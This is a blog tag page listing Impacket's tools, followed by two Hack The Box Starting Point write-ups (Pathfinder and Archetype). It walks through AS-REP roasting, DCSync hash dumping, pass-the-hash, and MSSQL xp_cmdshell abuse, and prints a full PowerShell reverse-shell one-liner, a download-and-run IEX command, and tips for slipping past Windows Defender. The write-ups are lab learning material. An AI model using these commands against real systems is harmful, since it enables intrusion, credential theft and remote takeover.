Tag: Impacket

Impacket

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.

Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

The following protocols are featured in Impacket

  • Ethernet, Linux “Cooked” capture.
  • IP, TCP, UDP, ICMP, IGMP, ARP.
  • IPv4 and IPv6 Support.
  • NMB and SMB1, SMB2 and SMB3 (high-level implementations).
  • MSRPC version 5, over different transports: TCP, SMB/TCP, SMB/NetBIOS and HTTP.
  • Plain, NTLM and Kerberos authentications, using password/hashes/tickets/keys.
  • Portions/full implementation of the following MSRPC interfaces: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, DCOM, WMI
  • Portions of TDS (MSSQL) and LDAP protocol implementations.

The following tools are featured in Impacket

Remote Execution

  • psexec.py: PSEXEC like functionality example using RemComSvc (https://github.com/kavika13/RemCom).
  • smbexec.py: A similar approach to PSEXEC w/o using RemComSvc. The technique is described here. Our implementation goes one step further, instantiating a local smbserver to receive the output of the commands. This is useful in the situation where the target machine does NOT have a writeable share available.
  • atexec.py: This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
  • wmiexec.py: A semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. Runs as Administrator. Highly stealthy.
  • dcomexec.py: A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects.

Kerberos

  • GetTGT.py: Given a password, hash or aesKey, this script will request a TGT and save it as ccache.
  • GetST.py: Given a password, hash, aesKey or TGT in ccache, this script will request a Service Ticket and save it as ccache. If the account has constrained delegation (with protocol transition) privileges you will be able to use the -impersonate switch to request the ticket on behalf another user.
  • GetPac.py: This script will get the PAC (Privilege Attribute Certificate) structure of the specified target user just having a normal authenticated user credentials. It does so by using a mix of [MS-SFU]’s S4USelf + User to User Kerberos Authentication.
  • GetUserSPNs.py: This example will try to find and fetch Service Principal Names that are associated with normal user accounts. Output is compatible with JtR and HashCat.
  • GetNPUsers.py: This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR.
  • ticketConverter.py: This script will convert kirbi files, commonly used by mimikatz, into ccache files used by Impacket, and vice versa.
  • ticketer.py: This script will create Golden/Silver tickets from scratch or based on a template (legally requested from the KDC) allowing you to customize some of the parameters set inside the PAC_LOGON_INFO structure, in particular the groups, ExtraSids, duration, etc.
  • raiseChild.py: This script implements a child-domain to forest privilege escalation by (ab)using the concept of Golden Tickets and ExtraSids.

Windows Secrets

  • secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) we try to read as much as we can from the registry and then we save the hives in the target system (%SYSTEMROOT%\Temp directory) and read the rest of the data from there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach. The script initiates the services required for its working if they are not available (e.g. Remote Registry, even if it is disabled). After the work is done, things are restored to the original state.
  • mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi.

Server Tools/MiTM Attacks

  • ntlmrelayx.py: This script performs NTLM Relay Attacks, setting an SMB and HTTP Server and relaying credentials to many different protocols (SMB, HTTP, MSSQL, LDAP, IMAP, POP3, etc.). The script can be used with predefined attacks that can be triggered when a connection is relayed (e.g. create a user through LDAP) or can be executed in SOCKS mode. In this mode, for every connection relayed, it will be available to be used later on multiple times through a SOCKS proxy.
  • karmaSMB.py: A SMB Server that answers specific file contents regardless of the SMB share and pathname specified.
  • smbserver.py: A Python implementation of an SMB server. Allows to quickly set up shares and user accounts.

WMI

  • wmiquery.py: It allows to issue WQL queries and get description of WMI objects at the target system (e.g. select name from win32_account).
  • wmipersist.py: This script creates/removes a WMI Event Consumer/Filter and link between both to execute Visual Basic based on the WQL filter or timer specified.

Known Vulnerabilities

  • goldenPac.py: Exploit for MS14-068. Saves the golden ticket and also launches a PSEXEC session at the target.
  • sambaPipe.py: This script will exploit CVE-2017-7494, uploading and executing the shared library specified by the user through the -so parameter.
  • smbrelayx.py: Exploit for CVE-2015-0005 using a SMB Relay Attack. If the target system is enforcing signing and a machine account was provided, the module will try to gather the SMB session key through NETLOGON.

SMB/MSRPC

  • smbclient.py: A generic SMB client that will let you list shares and files, rename, upload and download files and create and delete directories, all using either username and password or username and hashes combination. It’s an excellent example to see how to use impacket.smb in action.
  • addcomputer.py: Allows to add a computer to a domain using LDAP or SAMR (SMB).
  • getArch.py: This script will connect against a target (or list of targets) machine/s and gather the OS architecture type installed by (ab)using a documented MSRPC feature.
  • exchanger.py: A tool for connecting to MS Exchange via RPC over HTTP v2.
  • lookupsid.py: A Windows SID brute forcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.
  • netview.py: Gets a list of the sessions opened at the remote hosts and keep track of them looping over the hosts found and keeping track of who logged in/out from remote servers
  • reg.py: Remote registry manipulation tool through the [MS-RRP] MSRPC Interface. The idea is to provide similar functionality as the REG.EXE Windows utility.
  • rpcdump.py: This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well known endpoints.
  • rpcmap.py: Scan for listening DCE/RPC interfaces. This binds to the MGMT interface and gets a list of interface UUIDs. If the MGMT interface is not available, it takes a list of interface UUIDs seen in the wild and tries to bind to each interface.
  • samrdump.py: An application that communicates with the Security Account Manager Remote interface from the MSRPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.
  • services.py: This script can be used to manipulate Windows services through the [MS-SCMR] MSRPC Interface. It supports start, stop, delete, status, config, list, create and change.
  • smbpasswd.py: This script is an alternative to smbpasswd tool and intended to be used for changing expired passwords remotely over SMB (MSRPC-SAMR)

MSSQL / TDS

  • mssqlinstance.py: Retrieves the MSSQL instances names from the target host.
  • mssqlclient.py: An MSSQL client, supporting SQL and Windows Authentications (hashes too). It also supports TLS.

File Formats

  • esentutl.py: An Extensibe Storage Engine format implementation. Allows dumping catalog, pages and tables of ESE databases (e.g. NTDS.dit)
  • ntfs-read.py: NTFS format implementation. This script provides a mini shell for browsing and extracting an NTFS volume, including hidden/locked contents.
  • registry-read.py: A Windwows Registry file format implementation. It allows to parse offline registry hives.

Other

  • findDelegation.py: Simple script to quickly list all delegation relationships (unconstrained, constrained, resource-based constrained) in an AD environment.
  • GetADUsers.py: This script will gather data about the domain’s users and their corresponding email addresses. It will also include some extra information about last logon and last password set attributes.
  • Get-GPPPassword.py: This example extracts and decrypts Group Policy Preferences passwords using streams for treating files instead of mounting shares. Additionally, it can parse GPP XML files offline.
  • mqtt_check.py: Simple MQTT example aimed at playing with different login options. Can be converted into a account/password brute forcer quite easily.
  • rdp_check.py: [MS-RDPBCGR] and [MS-CREDSSP] partial implementation just to reach CredSSP auth. This example tests whether an account is valid on the target host.
  • sniff.py: Simple packet sniffer that uses the pcapy library to listen for packets in # transit over the specified interface.
  • sniffer.py: Simple packet sniffer that uses a raw socket to listen for packets in transit corresponding to the specified protocols.
  • ping.py: Simple ICMP ping that uses the ICMP echo and echo-reply packets to check the status of a host. If the remote host is up, it should reply to the echo probe with an echo-reply packet.
  • ping6.py: Simple IPv6 ICMP ping that uses the ICMP echo and echo-reply packets to check the status of a host.
Impacket banner
impacket

Pathfinder has been Pwned!

Posted on by Jonobi Musashi

Welcome back to haXez, a place where I hack boxes and write about them. I’m not pretending to be an elite hacker. in fact I hardly know anything. This place is for learning and for me to document my progress. We are currently working our way through the Starting Point on Hack The Box, so far we have managed to hack the following machines: Archetype, Oopsie, Vaccine and Shield. Today we are looking at Pathfinder.

This box was a lot of fun and straight forward thanks to the walkthrough from h4rithd. Yes, I’m using walkthroughs… Honestly though, a lot of the time on Hack The Box, the problem is knowing which questions to ask. If you don’t know about a certain tool or about that specific weakness in a software configuration. Then you could be looking for hours or even days to find a foothold. I’m here to learn about these tools and software configuration weaknesses. Not spend hours researching all the potential ways they could be exploited. Anyway, with that out the way, lets begin.

Reconnaissance

First I spun up the machine and connected to the VPN. Next I pinged the box to see if it was responding and yep, the machine started talking to me.

└──╼ [★]$ ping 10.10.10.30
PING 10.10.10.30 (10.10.10.30) 56(84) bytes of data.
64 bytes from 10.10.10.30: icmp_seq=1 ttl=127 time=21.6 ms

So what do we do next? We nmap of course.

└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.10.10.30 | tee -a nmap.txt
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49717/tcp open msrpc Microsoft Windows RPC
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h06m49s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021–09–11T17:34:17
|_ start_date: N/A

Well hello Domain Controller, have you come to tell me your secrets? Ok so there are a lot of services listening but the most important ones on a Domain Controller are usually: Server Message Block (SMB 445), Lightweight Directory Access Protocol (LDAP 389) and Kerberos (88). I did however immediately notice that port 53 TCP was open. Port 53 is used for DNS but you would normally only see it on UDP. If port 53 TCP is open then it usually means that the protocol is accepting DNS Zone transfer requests. Alas, hack failed, this one didn’t tell me anything.

└──╼ [★]$ dig axfr @10.10.10.30 MEGACORP
; <<>> DiG 9.16.15-Debian <<>> axfr @10.10.10.30 MEGACORP
; (1 server found)
;; global options: +cmd
; Transfer failed. :-(

So with that rabbit hole out the way it was time to look at Server Message Block. We need to see if it had been misconfigured to allow the listing of shares and stuff. I first ran enum4linux in hopes that it would give me some information. Honestly though, the tool just doesn’t seem to work that often. So next I used smbclient to see what was going on.

└──╼ [★]$ smbclient -L 10.10.10.30
Enter WORKGROUP\joe’s password:
Anonymous login successful
Sharename Type Comment
 — — — — — — — — — — -

The Anonymous login was successful but there was nothing on there. Hmmm another dead end. Ok then, lets focus on LDAP and see what information we can interrogate out of it. At first I was getting nowhere. I got a bit of information out from the protocol using ldapsearch but nothing substantial.

└──╼ [★]$ sudo ldapsearch -x -h 10.10.10.30 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
dn:
namingcontexts: DC=MEGACORP,DC=LOCAL
namingcontexts: CN=Configuration,DC=MEGACORP,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=MEGACORP,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=MEGACORP,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1

User Enumeration Hack

So what was next? Well this is where I turned to the walkthrough written by h4rithd. Honestly I wouldn’t have gotten any further if it wasn’t for this walkthrough. So it turns out that the Sandra user on the Shield box was quite important. I should have learnt my lesson by now but as soon as I get the root flag, I log off write up. Sandra appears to exist on this box and we can use their credentials to do some enumeration. Enter ldapdomaindump, this tool is cool. Running ldapdomaindump with sandra’s credentials we get a bunch of html files containing information about the domain.

This shows users on the machine we want to hack
Domain users
This shows the groups on the machine we want to hack
Domain users by group
This shows the users on the machine we want to hack.
Kerberos DONT_REQ_PREAUTH

Foothold Hack

The one user that should grab our attention is the svc_bes as it doesn’t require Kerberos pre authentication. If pre authentication isn’t required, then we can trick Kerberos in to giving us an encrypted Ticket Granting Ticket hash. We can then hack or crack it offline. I’m getting ahead of myself, more about that later. So lets grab that TGT hash! Using the Impacket tool GetNPUsers.py we can request the TGT for the svc_bes user.

└──╼ [★]$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py MEGACORP.LOCAL/svc_bes -dc-ip 10.10.10.30 -request -no-pass -format john
Impacket v0.9.22 — Copyright 2020 SecureAuth Corporation
[*] Getting TGT for svc_bes
[email protected]:c818cd9132de09878439dd73cc96a930$73b8ea1807114952f569afabd24391f25818660e8386fa926857af7d6382ad42d9d24e80300fcb43ebdcd40b2bbb9d13b462a83b5b87417e341625a146b503e89fdb18a6ff80fcce6fe776160e45cbf7a32978eee153d5f3b55539cef3c4ac56763811ce5d1b856afa9fce10fa3cdda54828ba2dc047f5109697ca0d0fecd3387421e328240c9b17a9567faa8be961ac30a739d56a1b66d9d5f6b1df01f7176382a7a483527cea0a8c2105a0812d142333b0412734eeee144d9be74c16cb1b3220e881819120a2691a825f19fbb9761d1c23cba03c8ed84ac4203a0706fa4e7fd947150e65ff7a78c0f4f051ad61bb49

Yummmm, don’t you just love the smell of hashes in the morning, or anytime for that matter. Ok so what’s next? Well we need to talk to our mate John and ask him to do the dirty work. No I don’t me kill him. I mean crack him really hard with a rock. Grab the hash output and chuck it in a file. Then using your favourite non escapable text editor vim, or nano. Then, tell John where your rock is and ask him politely to beat the secrets out of him.

└──╼ [★]$ sudo john beshash.txt — wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
Sheffield19 ([email protected])
1g 0:00:00:08 DONE (2021–09–11 12:22) 0.1157g/s 1227Kp/s 1227Kc/s 1227KC/s Sherbert!!..Shawnee
Use the “ — show” option to display all of the cracked passwords reliably
Session completed

Voila, the password is Sheffield19.

Story time, I once met Darren Kitchen from Hak5 in Sheffield when he was touring the UK on his motorcycle. I caught the train there from where I was staying for Uni and had a beer with him. Really cool guy but I couldn’t stay long as the last train was at midnight or something. Someone took a photo but I never got a copy. Hey photography man. If you’re out there, I would love the Picture of Darren and myself from the Hak5 Sheffield meet please.

Anyway, moving on. We now have the password and can use evil-winrm to hack in to the box and see what’s around.

└──╼ [★]$ evil-winrm -u svc_bes -p Sheffield19 -i 10.10.10.30
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_bes\Documents>
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> type user.txt
b05XXXXXXXXXXXXXXXXX37f1

Privilege Escalation Hack

Turns out what was around was the user flag and now we have successfully captured it. Ok so what’s next? We have a vaid set of credentials. Lets see if we can try and dump some secrets using the impacket tool secretsdump.py. This tool performs a DCSync hack against the machine due to the trust that is provided by the authenticated user. This means it is possible to use the domain replication privileges of the authenticated user to gather information from the domain. Including password hashes. For it to work though, we need to know If our user has domain replication privileges.

└──╼ [★]$ /usr/share/doc/python3-impacket/examples/secretsdump.py MEGACORP.LOCAL/svc_bes:[email protected]
Impacket v0.9.22 — Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 — rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:9635702428c5134926387fa5db2010c8:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1–96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f
Administrator:aes128-cts-hmac-sha1–96:5235da455da08703cc108293d2b3fa1b
Administrator:des-cbc-md5:f1c89e75a42cd0fb
krbtgt:aes256-cts-hmac-sha1–96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d
krbtgt:aes128-cts-hmac-sha1–96:02abd84373491e3d4655e7210beb65ce
krbtgt:des-cbc-md5:d0f8d0c86ee9d997
svc_bes:aes256-cts-hmac-sha1–96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238
svc_bes:aes128-cts-hmac-sha1–96:7d671ab13aa8f3dbd9f4d8e652928ca0
svc_bes:des-cbc-md5:1cc16e37ef8940b5
sandra:aes256-cts-hmac-sha1–96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810
sandra:aes128-cts-hmac-sha1–96:c399018a1369958d0f5b242e5eb72e44
sandra:des-cbc-md5:23988f7a9d679d37
PATHFINDER$:aes256-cts-hmac-sha1–96:753157a7307cc0c55569930f182edad660cc4492f27491efb6b8f6f1f7dd8824
PATHFINDER$:aes128-cts-hmac-sha1–96:e25b80d1951cd2410ac1ce2f446b63f4
PATHFINDER$:des-cbc-md5:25fbb06d258cd943
[*] Cleaning up…

We have an Administrator password hash. Lets be kind and pass it forward using psexec.py

└──╼ [★]$ /usr/share/doc/python3-impacket/examples/psexec.py MEGACORP.LOCAL/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
Impacket v0.9.22 — Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.30…..
[*] Found writable share ADMIN$
[*] Uploading file fpnaGrFs.exe
[*] Opening SVCManager on 10.10.10.30…..
[*] Creating service ovNb on 10.10.10.30…..
[*] Starting service ovNb…..
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
© 2018 Microsoft Corporation. All rights reserved.

He shoots, he scores, and for my final trick I will recover the root.txt flag.


C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
ee6XXXXXXXXXXXXXXXXX645
This shows that the machine we were trying to Hack has indeed been pwned!
Pathfinder has been Pwned!

Archetype has been Pwned!

Posted on by Jonobi Musashi

Reconnaissance

Today we’re going to be hacking in to the Hack The Box machine Archetype. This machine is one of the Starting Point machines that I will be hacking my way through. Ok let’s begin, Once you have spun up the box and connected to the VPN it’s time to get scanning. I tend to run nmap with the following flags;

sudo nmap -sC -sV -O -p0- 10.10.10.27

This will scan all ports and check for the service version, the operating system version and will run any “safe scripts” against the discovered services. It’s not always a good idea to run the vulnerability script but on this occasion I did. The results are shown below.

PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
| smb-vuln-ms08–067: 
| VULNERABLE:
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2008–4250

Based on the results I initially went after the ms08–67 vulnerability. I used metasploit to try and hack it but alas, no such luck. There was a problem with the language detection on the remote host so the exploit didn’t work.

The next service I went after was the Server Message Block protocol. The tool smbclient can be used to list the shared directories being served by the SMB service.

smbclient -L 10.10.10.27
Sharename    Type        Comment
 — — — — — — — — — — - - - - - - - - -
 ADMIN$      Disk        Remote Admin
 backups     Disk 
 C$          Disk        Default share
 IPC$        IPC         Remote IPC

Based on the results from smbclient it was evident that the backups directory could be mounted.

smclient \\\\10.10.10.27\\backups

The backup directory contained a file called prod.dtsConfig. It was possible to download this file and view the contents. The file appeared to be a configuration file and contained the password of the ARCHETYPE\sql_svc MSSQL user.

<DTSConfiguration>
 <DTSConfigurationHeading>
 <DTSConfigurationFileInfo GeneratedBy=”…” GeneratedFromPackageName=”…” GeneratedFromPackageID=”…” GeneratedDate=”20.1.2019 10:01:34"/>
 </DTSConfigurationHeading>
 <Configuration ConfiguredType=”Property” Path=”\Package.Connections[Destination].Properties[ConnectionString]” ValueType=”String”>
 <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
 </Configuration>
</DTSConfiguration>

Foothold Hack

Ok, time to start hacking. It was then possible to connect to the MSSQL service using the credentials provided in the prod.dtsConfig file. In order to connect to the MSSQL service I used the Impacket tool mssqlclient.py

python mssqlclient.py ARCHETYPE/[email protected] -windows-auth

After providing the password I was logged on to the server. In order to check whether we had sysadmin level privledges I ran the following command.

SELECT IS_SRVROLEMEMBER(‘sysadmin’)

It appeared that I had sysadmin level privileges so it was time to get a reverse shell set up so I could connect to the box. In order to do this I pinched the following Powershell script and modified it with my IP address and the port I wanted the server to connect to me on.

$client = New-Object System.Net.Sockets.TCPClient(“10.10.15.82”,4000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “#”;$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

It is worth noting that I had a few issues with the following part of the script being picked up by Windows Defender. However after some google fu I disovered the particular paramter it didn’t like. It appears that Windows Defender doesn’t like “PS “ + (pwd).Path + “>. It was also quite particular about the spacing within the “#”; part of the script.

sendback + “PS “ + (pwd).Path + “> “;$sendbyte =

With the script edited and my IP address and port added, it was time to host the script so that the remote server could download and execute it. In order to do this I used the HTTP Python module to serve the file locally.

sudo python3 -m http.server 80

With the file being served on my local machine I had to set up a listener in order to connect the reverse connection from the server to my local machine. In order to do this I used the netcat tool.

sudo nc -lvp 4000

Privilege Escalation Hack

Then on the remote server I ran a command to tell the server to download and execute the script being hosted on my local machine.

xp_cmdshell “powershell “IEX (New-Object Net.WebClient).DownloadString(\”http://10.10.15.82/shell.ps1\");"

This created a reverse shell connection back to my local machine. It was then possible to browse the local file system and run commands as though I were logged on to it locally. The first thing I wanted to check and that I recommend checking is the history. It may contain useful information left by the box creator or by other hackers.

#type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

BINGO, there was a valid set of credentials in the history. It was then possible to connect to the server using the Impacket psexec.py tool.

sudo python /usr/share/doc/python3-impacket/examples/psexec.py [email protected]

Once logged in as administrator it was possible to recover all the keys required to complete the box. Hacking is so much fun. 

C:\Windows\system32>type C:\Users\sql_svc\Desktop\user.txt
3e7**********************a3
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
b91**********************528
Hack The Box Archetype has been pwned!
Hack The Box Archetype has been pwned!

If you liked this post then check out some of my other ones. I have done write-ups for  ArchetypeOopsie, VaccineShieldPathfinder and Included.